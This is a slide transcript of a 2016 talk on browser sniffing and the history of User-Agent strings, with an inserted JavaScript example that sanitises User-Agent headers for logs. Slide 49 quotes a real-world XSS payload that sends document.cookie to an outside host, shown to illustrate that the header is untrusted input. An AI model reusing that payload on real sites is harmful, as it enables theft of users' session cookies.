
Everybody lies @ NLHTML5


This is a talk about browser sniffing. And yes, I do realise it is 2016. I know browser sniffing is ugly and we should all be using feature detection. But a quick search on GitHub still shows millions of lines of code referring to user agent strings. So this message clearly hasn’t landed yet. But why is browser sniffing a bad choice? This talk will dive into history and show the origin of the user agent string and the hidden battle between browser makers and web developers. It will show its simple beginnings and the horrible monstrosity it has become.

Niels Leenheer

March 17, 2016

Transcript

  1. everybody lies


    NLHTML5 @ Nerds & Company, March 17th 2016


  5. yes, this talk is about browser sniffing

  6. why a talk about browser sniffing?

  7. browser sniffing is dirty

  8. you should use feature detection

  9. why a talk about browser sniffing?

  11. what is browser sniffing?

  12. The HTTP specification defines the User-Agent header.
    It contains a string with information about the browser.

  13. Every request the browser makes to the server includes
    the User-Agent header

  14. GET http://whichbrowser.net/ HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Accept-Language: en-us
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)
    Accept-Encoding: gzip, deflate
    Connection: Keep-Alive
    Host: whichbrowser.net


  15. GET http://whichbrowser.net/ HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Accept-Language: en-us
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)
    Accept-Encoding: gzip, deflate
    Connection: Keep-Alive
    Host: whichbrowser.net

    HTTP/1.1 200 OK
    Date: Mon, 08 Feb 2016 10:40:28 GMT
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16
    Last-Modified: Thu, 15 Jan 2015 10:10:40 GMT
    ETag: "984-50cae11796432"
    Accept-Ranges: bytes
    Content-Length: 2436
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8




  16. You can access the exact same string using JavaScript

  17. <script>
    <!--
    alert(navigator.userAgent);
    //-->
    </script>

  18. You can use the User-Agent string to identify:
    the browser
    the rendering engine
    the operating system
    the device model
    and more

  19. why browser sniffing is hard

  20. things started out simple

  21. Mosaic/1.0 (Win3.1)
    Mosaic
    The name of the browser
    The version of the browser
    Operating system

  22. Mozilla/1.0 (Win3.1)
    Netscape Navigator
    The code name of the browser
    The version of the browser
    Operating system

  23. but it quickly started to get complicated

  24. Mozilla/1.0 (compatible; MSIE 1.0; Windows 95)
    Internet Explorer
    The name of the browser
    The version of the browser
    Operating system
    Compatible with Netscape Navigator 1.0

  25. Opera/8.54 (Windows 95; U; en)
    Opera
    The name of the browser
    The version of the browser
    Operating system
    United States level encryption
    English language

  26. Opera/10.00 (Windows NT 5.1; U; en) Presto/2.2.0
    Opera
    The name of the browser
    The version of the browser
    Rendering engine

  27. Opera/9.8 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.10
    Opera
    The name of the browser
    Fake version of the browser
    Real version of the browser

  28. Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.0.12) Gecko/20090706 Firefox/3.0.12
    Firefox
    The name of the browser
    Version of the browser
    The name of the rendering engine
    Version of the rendering engine
    Build date of the rendering engine

  29. Mozilla/5.0 (Windows NT 6.0; rv:15.0) Gecko/20100101 Firefox/15.0
    Firefox
    Build date is no longer updated

  30. Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/16.0 Firefox/16.0
    Firefox

  31. and it gets worse…

  32. Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3
    Safari
    The name of the browser
    Version of the browser

  33. Mozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/525.28.3
    Chrome
    The name of the browser
    Version of the browser

  34. Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.180
    Opera
    The name of the browser
    Version of the browser

  35. Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
    Internet Explorer
    Version of the browser

  36. Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/525.28.3 Edge/12.10162
    Edge
    The name of the browser
    Version of the browser

  37. and those were all relatively normal User-Agent strings

  38. “User-Agent strings only get larger over time, never smaller”
    Niels’s second law of User-Agent strings

  39. Mozilla/5.0 (Linux; Android 4.3; en; SAMSUNG GT-I9505 Build/JSS15J) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
    Samsung Internet
    Version of the browser
    Samsung device

  40. Mozilla/5.0 (Series40; NOKIALumia800; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.8.0.50.5
    Nokia Xpress for Windows Phone

  41. Mozilla/5.0 (X11; Linux; ko-KR) AppleWebKit/534.26+ (KHTML, like Gecko) Version/5.0 Safari/534.26+
    LG Netcast

  42. Sometimes browsers include a compatibility mode, or desktop mode
    which deliberately changes the User-Agent string

  43. Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50
    Opera
    The name of the browser
    Version of the browser
    The name of the operating system

  44. Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50
    Opera Mobile (desktop mode)
    The name of the browser
    Version of the browser
    ROT 13 encrypted “mobi”

  45. Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
    Internet Explorer
    Browser version

  46. Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
    Internet Explorer (compatibility view)
    Trident 5 means it’s Internet Explorer 9

  47. And it is possible to change the User-Agent string yourself


  48. http://www.sexxlife.it/sexyshop (sexy shop - sexy toys, BDSM,
    vibratori, falli, vagine, lubrificanti, dvd porno, film hard,
    lingerie - Migliaia di articoli nel nostro sexy shop online.;
    http://www.sexxlife.it; [email protected])
    spam


  49. alert("My Little Pony");
    document.location="http://www.max1094.18.lc/admin/cookies.php?c=" + document.cookie;
    alt="My Little Pony">
    XSS attacks

  50. XSS attacks



  51. Mozilla/10.0 (compatible; MSIE 10.0; CP/M; 8-bit)
    Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Microsoft; Surface Zune Phone XL) AppleWebKit/537.36 (KHTML, like Gecko)
    (╯°□°）╯︵ ┻━┻
    funny people

  52. angry people

  53. FuckZilla/666.0 (Gavnoid; Debile; rv:123.0) FuckYou/123.0 FuckingFox/321.0
    Opera/9.80 (Windows NT 6.1; U; FuckYou; xx) Presto/2.10.229 Version/11.62
    Seriously, Go fuck yourself
    W3C standards are important. Stop fucking obsessing over user-agent already.
    angry people

  54. 1.000.000 unique useragent strings
    82 x fuck
    10 x shit
    6 x ass
    9 x dick
    3 x vagina
    108 x sex
    4 x balls

  55. User-Agent strings cannot be trusted!
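
Slides 48 to 55 show that a User-Agent header can carry spam and script payloads, while slides 63 and 64 recommend it for analytics and error logging, which is exactly where the string gets stored and displayed. The following is an added example, not code from the talk: it treats the header as untrusted input before it reaches a log line or an HTML report. The function names, the 512-character cap and the sample headers are assumptions made for illustration.

```javascript
// Added example: treat the User-Agent header as attacker-controlled input.
// All names and the length cap are assumptions, not part of the talk.
const MAX_UA_LENGTH = 512;

// Normalise a raw header value before it is stored or written to a log line.
function normalizeUserAgent(raw) {
  if (typeof raw !== 'string') return '';
  // Replace control characters (CR/LF included) so a single header
  // cannot forge extra log lines or hide terminal escape sequences.
  const cleaned = raw.replace(/[\u0000-\u001f\u007f]/g, ' ').trim();
  return cleaned.length > MAX_UA_LENGTH
    ? cleaned.slice(0, MAX_UA_LENGTH) + '...'
    : cleaned;
}

const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};

// Escape at output time; safe for HTML text nodes and quoted attributes.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Render one row of a hypothetical analytics or error-log report.
// Truncation runs before escaping, so a cut never splits an HTML entity.
function renderUserAgentRow(rawUserAgent, hits) {
  const ua = escapeHtml(normalizeUserAgent(rawUserAgent));
  const count = Number.isInteger(hits) && hits >= 0 ? hits : 0;
  return `<tr><td title="${ua}">${ua}</td><td>${count}</td></tr>`;
}

// Constructed sample headers, not taken from real traffic.
const SAMPLE_HEADERS = [
  'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko',
  '<script>alert("My Little Pony");</script>',
  'Mozilla/5.0\r\n2016-03-17 10:40:28 ERROR forged log entry',
  'A'.repeat(5000),
];

function renderReport(headers) {
  return headers.map((h) => renderUserAgentRow(h, 1)).join('\n');
}

console.log(renderReport(SAMPLE_HEADERS));
```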

  56. Everybody lies

  57. you should never use browser sniffing for controlling access to your website

  58. you should never use browser sniffing for determining browser capabilities

  59. you should never build your own browser sniffing library

  60. what is browser sniffing good for?

  61. improve ux
    if you know the platform or browser, you can streamline the user experience

  63. analytics
    if you know your users, you can build a better site for them

  64. error logging
    if you know which browser is causing problems, you can fix them

  68. Use a browser sniffing library that is regularly updated. And check if
    it is possible to automatically schedule updates.

  69. Try libraries like UAParser, PiwikDeviceDetector or WhichBrowser
    https://github.com/ua-parser
    https://github.com/piwik/device-detector
    https://github.com/whichbrowser

  70. Please don’t use WURFL because it is outdated and just not good

  72. “If you tell a big enough lie and tell it frequently enough, it will be believed”
    — Gandhi

  74. “If you tell a big enough lie and tell it frequently enough, it will be believed”
    — Adolf Hitler

  75. Thank you!